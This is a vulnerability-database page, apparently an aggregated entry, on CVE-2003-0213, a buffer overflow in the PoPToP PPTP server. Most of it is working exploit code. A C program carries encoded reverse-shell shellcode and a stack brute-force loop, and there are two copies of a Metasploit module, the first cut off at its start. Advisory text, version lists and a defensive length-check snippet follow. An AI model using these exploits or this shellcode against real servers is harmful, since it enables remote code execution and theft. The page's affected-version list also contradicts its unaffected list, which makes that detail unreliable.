			datastore['Hostname'].ljust(64, "\x00") +
			datastore['Vendor'].ljust(64, "\x00")
	end

	def check
		connect
		sock.put(build_packet(156))
		res = sock.get_once

		if res and res =~ /MoretonBay/
			return CheckCode::Detected
		end

		return CheckCode::Safe
	end

	def brute_exploit(addrs)
		connect

		print_status("Trying #{"%.8x" % addrs['Ret']}...")

		# Construct the evil length packet
		packet =
			build_packet(1) +
			payload.encoded +
			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

		sock.put(packet)

		handler
		disconnect
	end

end
		

- Vulnerability Information (22479)

PoPToP PPTP 1.0/1.1.x Negative read() Argument Remote Buffer Overflow Vulnerability (EDBID:22479)
linux remote
2003-04-09 Verified
0 John Leach
N/A
source: http://www.securityfocus.com/bid/7316/info

A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.

Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server. 

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <errno.h>

/* Ported to Linux by John Leach <john@johnleach.nospam.co.uk> */

typedef int SOCKET;
typedef unsigned short WORD;
typedef unsigned int DWORD;


char shellcode[] =

"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"

"\x01\x01" // port

"\x54\xd6\x63"

"\x01\x01\x01\x01" // ip address

"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67"
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e"
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b"
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60"
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa"
"\xfd\xbc\xe0\xfb";




struct pptp_header {
        u_int16_t length;               /* pptp message length incl header */
        u_int16_t pptp_type;            /* pptp message type */
        u_int32_t magic;                /* magic cookie */
        u_int16_t ctrl_type;            /* control message type */
        u_int16_t reserved0;            /* reserved */
};

#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100

struct pptp_start_ctrl_conn_rqst {
        struct pptp_header header;      /* pptp header */
        u_int16_t version;              /* pptp protocol version */
        u_int16_t reserved1;            /* reserved */
        u_int32_t framing_cap;          /* framing capabilities */
        u_int32_t bearer_cap;           /* bearer capabilities */
        u_int16_t max_channels;         /* maximum channels */
        u_int16_t firmware_rev;         /* firmware revision */
        u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
        u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
        struct pptp_header header;      /* header */
        u_int32_t identifier;           /* value to match rply with rqst */
                                char buf[10000];
};

struct pptp_reply {
	struct pptp_header header;      /* header */
	char buf[10000];
};


/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
#define TOPOFSTACK 0xbfffffff
#define BOTTOMOFSTACK 0xbf000000
#define STEP 50

void send_init_request(SOCKET st)
{
        struct pptp_start_ctrl_conn_rqst request;
  	request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  	request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

  	request.version = PPTP_VERSION;
        request.framing_cap = 0;
        request.bearer_cap = 0;
        request.max_channels = 1;
        request.firmware_rev = 0;
  	strcpy(request.hostname,"hell");
        strcpy(request.vendor,"domain HELL");
  	request.header.length = ntohs(sizeof(request));

        send(st,(char*)&request,sizeof(request),0);

}

void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port)
{ 
	int i;
  	struct pptp_echo_rqst ping;
        ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  	ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        ping.header.ctrl_type = htons(ECHO_RQST);
        ping.identifier = 111;

        ping.header.length = ntohs(1);
        
  
        strcpy(ping.buf,"");
        
        int buflen = 500;
        for (i=0;i<buflen;i++) strcat(ping.buf,"\x90");      
        memcpy(ping.buf+364,(char*)&ret,4); 

        // patch shellcode
        // we have a shellcode xored by 0x93.. let's unxor it :)
        for (i=0;i<sizeof(shellcode);i++) shellcode[i] ^= 0x93;

        *(unsigned short int*)(shellcode+43) = htons(port);
        
  	*(unsigned long int*)(shellcode+48) = inet_addr(hostname);

        // we leave 100 bytes for NOPs
        memcpy(ping.buf+100,shellcode,sizeof(shellcode));
                
        send(st,(char*)&ping,sizeof(ping.header)+buflen,0);
 
}

SOCKET st;

int connect_server(char* hostname)
{
        st=socket(PF_INET,SOCK_STREAM,0);
        if (st==-1) return 0;

        struct sockaddr_in addr;

        addr.sin_family=AF_INET;
        addr.sin_port=0;
        addr.sin_addr.s_addr=0;
        bind(st, (struct sockaddr*)&addr,sizeof(addr));
  
        
        addr.sin_family=AF_INET;
        addr.sin_port=htons(1723);
        addr.sin_addr.s_addr=inet_addr(hostname);
        printf("connecting... ");
        if (connect(st,(struct sockaddr*)&addr,sizeof(addr)) != 0)
        {
		perror("connect()");
                return 0;
        }
        return 1;
}

int main(int argc, char** argv)
{
        printf("\n");
        printf("                   D  H     H                            \n");
        printf("                   D  H     H     T\n");
        printf("                   D  H  H  H     T     EE    AA   M   M \n");
        printf("               DDD D  HHHHHHH     T    E  E  A  A  MM MM \n");
        printf("              D   DD  H  H  H    TTTT  E  E  A  A  MM MM \n");
        printf("             D     D  H     H     T    EEE   AAAA  M M M \n");
        printf("              D    D  H     H     T    E     A  A  M   M \n");
        printf("               DDDD   H     H      TTT  EEE  A  A  M   M   ");
        printf(" ... presents ... \n\n");
  	printf("Exploit for PoPToP PPTP server older than \n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
        printf("by .einstein., April 2003.\n");
        printf("\n");
  if (argc < 2)
  {
        printf("usage: \n");
        printf("  %s <pptp_server> [<your_ip>] [<your_port>] [<timeout>]\n\n",argv[0]);
        printf("    <pptp_server> is the ip address or hostname of the PoPToP server\n");
        printf("      you want to attack.  Port 1723 is used for connection\n");
        printf("    <your_ip> and <your_port> - specify an ip address to which\n");
        printf("      a connection is possible to port <your_port> and set up a\n");
        printf("      netcat listener. You'll get a reverse shell.\n");
        printf("    <timeout> is a delay between stack bruteforce attemts, in milliseconds\n");
        printf("   If you only pass a single parameter, the program will check\n");
        printf("   whether remote server is vulnerable or not. Otherwise it will\n");
        printf("   perform a ret bruteforce.\n");
        printf("usage examples:\n");
        printf("  %s 192.168.1.2 192.168.1.1 5555\n",argv[0]);
        printf("    attack 192.168.1.2 and get a reverse shell on port 5555\n");
        printf("  %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]);
        printf("    attack a locally running pptpd with a timeout of 100 ms\n");
        printf("    and get a shell on port 6666.\n");
        printf("  %s 192.168.1.56\n",argv[0]);
        printf("    check if the PoPToP server on 192.168.1.56 is vulnerable.\n");
	return 0;
  }


  int timeout = 500;
  if (argc >= 5) timeout = atoi(argv[4]);

        DWORD ret;
        if (argc == 2)
        {
                if (!connect_server(argv[1])) return 1;

                printf("\nChecking if the server is vulnerable..\n");
                printf("(if it is you have to wait 65 seconds)..\n");
                send_init_request(st);

                ret = 0x01010101;
                int bytes;
                struct pptp_reply reply;
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                bytes = ntohs(reply.header.length);
                bytes = recv(st,(char*)&reply+2,bytes-2,0);
                int j = htons(reply.header.ctrl_type);
                send_ping_overflow(st,ret,"0.0.0.0",0);
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                printf("PoPToP server is ");
                if (bytes != -1) printf("vulnerable!\n");
                else printf("not vulnerable\n");
                close(st);

                return 1;
        }

        printf("[!] Attempting bruteforce against %s\n",argv[1]);
        printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));
        
        int checked = 0;
        
        for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP)
        {
          	printf("[*] ");
                if (!connect_server(argv[1])) return 1;
        	printf("[ret=0x%x]..",ret);
        	printf("sending payload..");
        
                // initial packet
                send_init_request(st);

                //a real overflowing ping packet
          	send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
                close(st);

                sleep(timeout);
                printf("done\n");
        }
        
        return 0;
}

- Vulnerability Information (F82248)

Poptop Negative Read Overflow (PacketStormID:F82248)
2009-10-27 00:00:00
spoonm  
exploit,overflow
CVE-2003-0213

This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Brute

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Poptop Negative Read Overflow',
			'Description'    => %q{
	 This is an exploit for the Poptop negative read overflow.  This will
    work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
    currently do not have a good way to detect Poptop versions.

    The server will by default only allow 4 concurrent manager processes
    (what we run our code in), so you could have a max of 4 shells at once.

    Using the current method of exploitation, our socket will be closed
    before we have the ability to run code, preventing the use of Findsock.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0213'],
					['OSVDB', '3293'],
					['URL',   'http://securityfocus.com/archive/1/317995'],
					['URL',   'http://www.freewebs.com/blightninjas/'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# Payload space is dynamically determined
					'MinNops'         => 16,
					'StackAdjustment' => -1088
				},
			'SaveRegisters'  => [ 'esp' ],
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        => 
				[
					['Linux Bruteforce', 
						{ 'Bruteforce' => 
							{
								'Start'  => { 'Ret' => 0xbffffa00 },
								'Stop'   => { 'Ret' => 0xbffff000 },
								'Step'   => 0
							}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 9 2003'))

		register_options(
			[
				Opt::RPORT(1723)
			], self.class)

		register_advanced_options(
			[
				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
			], self.class)
	end

	# Dynamic payload space calculation
	def payload_space
		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
	end

	def build_packet(length)
		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
		[1,0].pack('cc') +
		[0].pack('n') +
		[1,1,0,2600].pack('NNnn') +
		datastore['Hostname'].ljust(64, "\x00") +
		datastore['Vendor'].ljust(64, "\x00")
	end

	def check
		connect
		sock.put(build_packet(156))
		res = sock.get

		if res =~ /MoretonBay/
			return Exploit::CheckCode::Detected
		end

		return Exploit::CheckCode::Safe
	end
		
	def brute_exploit(addrs)
		connect

		print_status("Trying #{"%.8x" % addrs['Ret']}...")

		# Construct the evil length packet
		packet = 
			build_packet(1) +
			payload.encoded +
			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

		sock.put(packet)
		
		handler
		disconnect
	end
	
end


- Vulnerability Information

3293
PoPToP PPTP ctrlpacket.c Negative Read Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

The PoPToP PPTP Server contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when the server receives a malicious packet with the length field set to either zero or one. This causes a read operation to use a negative value, allowing sensitive memory regions to be overwritten with user-supplied data. It is possible that the flaw may allow arbitrary code execution on the Linux platform, resulting in a loss of integrity or availability.
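The length check that closes this negative-read path, as an added illustration rather than pptpd's own code: struct and function names are assumptions, and the two sample frames are constructed.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>
/* PPTP control-message header as on the wire (RFC 2637). Struct and
 * function names below are assumptions, not pptpd's own. */
struct pptp_ctrl_hdr {
    uint16_t length;     /* total message length, header included */
    uint16_t pptp_type;  /* 1 = control message */
    uint32_t magic;      /* 0x1a2b3c4d */
    uint16_t ctrl_type;
    uint16_t reserved0;
};
#define PPTP_MAGIC_COOKIE 0x1a2b3c4d
#define PPTP_CTRL_MESSAGE 1

/* The server reads the 2-byte length word, then "length - 2" more bytes
 * into a fixed buffer. Unchecked, a length of 0 or 1 makes that count
 * negative; as a size_t it is huge and read() runs past the buffer.
 * This helper decides how many bytes may follow the length word:
 * -1 rejects the frame, otherwise the count covers at least a full
 * header and never exceeds buf_cap - 2. */
int pptp_bytes_after_length(uint16_t wire_length, size_t buf_cap)
{
    uint16_t len = ntohs(wire_length);
    if (len < sizeof(struct pptp_ctrl_hdr)) return -1; /* covers 0 and 1 */
    if (len > buf_cap) return -1;                      /* would overrun */
    return (int)len - 2;
}
/* Validate a complete frame already in memory; returns the number of
 * payload bytes after the header, or -1 if the frame is rejected. */
int pptp_ctrl_payload_len(const unsigned char *buf, size_t buf_len)
{
    struct pptp_ctrl_hdr h;
    int rest;
    if (buf_len < sizeof h) return -1;
    memcpy(&h, buf, sizeof h);
    rest = pptp_bytes_after_length(h.length, buf_len);
    if (rest < 0) return -1;
    if (ntohs(h.pptp_type) != PPTP_CTRL_MESSAGE) return -1;
    if (ntohl(h.magic) != PPTP_MAGIC_COOKIE) return -1;
    return rest + 2 - (int)sizeof h;
}

/* Constructed samples: a 156-byte Start-Control-Connection-Request
 * (zero-filled past the header) and the same frame with length = 1. */
static const unsigned char sample_sccrq[156] = {
    0x00, 0x9c, 0x00, 0x01, 0x1a, 0x2b, 0x3c, 0x4d, 0x00, 0x01, 0x00, 0x00 };
static const unsigned char sample_len1[156] = {
    0x00, 0x01, 0x00, 0x01, 0x1a, 0x2b, 0x3c, 0x4d, 0x00, 0x05, 0x00, 0x00 };
```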

- Timeline

2003-04-09 Unknown
2003-04-18 Unknown

- Solution

Upgrade to at least version 1.1.4-b3 for users of the 1.1.4 tree and version 1.1.3-20030409 for users of the 1.1.3 tree. An upgrade is required as there are no known workarounds.

- Vulnerability Information

PoPToP PPTP Negative read() Argument Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 7316
Remote: Yes
Local: No
Published: 2003-04-09 12:00:00
Updated: 2007-11-15 12:39:00
The discovery of this vulnerability has been credited to Timo Sirainen <tss@iki.fi>

- Affected Versions

RedHat Linux 9.0 i386
PoPToP PPTP Server 1.1.4 -b2
PoPToP PPTP Server 1.1.4 -b1
PoPToP PPTP Server 1.1.3 -20021009
PoPToP PPTP Server 1.1.3
PoPToP PPTP Server 1.1.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux Personal 8.2
PoPToP PPTP Server 1.0.1
PoPToP PPTP Server 1.0
PoPToP PPTP Server 1.1.4 -b3
PoPToP PPTP Server 1.1.3 -20030409

- Unaffected Versions

PoPToP PPTP Server 1.1.4 -b3
PoPToP PPTP Server 1.1.3 -20030409

- Vulnerability Discussion

A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.

Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server.

- Exploitation

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been released as part of the MetaSploit Framework 2.0.

The following exploits were provided:

- Solution

The vendor has released updated versions of the PPTP server to address this issue. Please see the references for details.


PoPToP PPTP Server 1.0

PoPToP PPTP Server 1.1.2

PoPToP PPTP Server 1.1.3 -20021009

PoPToP PPTP Server 1.1.3

PoPToP PPTP Server 1.1.4 -b1

PoPToP PPTP Server 1.1.4 -b2

About SCAP Chinese Community

SCAP Chinese Community is the first Chinese open community in China dedicated to SCAP. For more information, see [About this site]

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are all hosted on MITRE's websites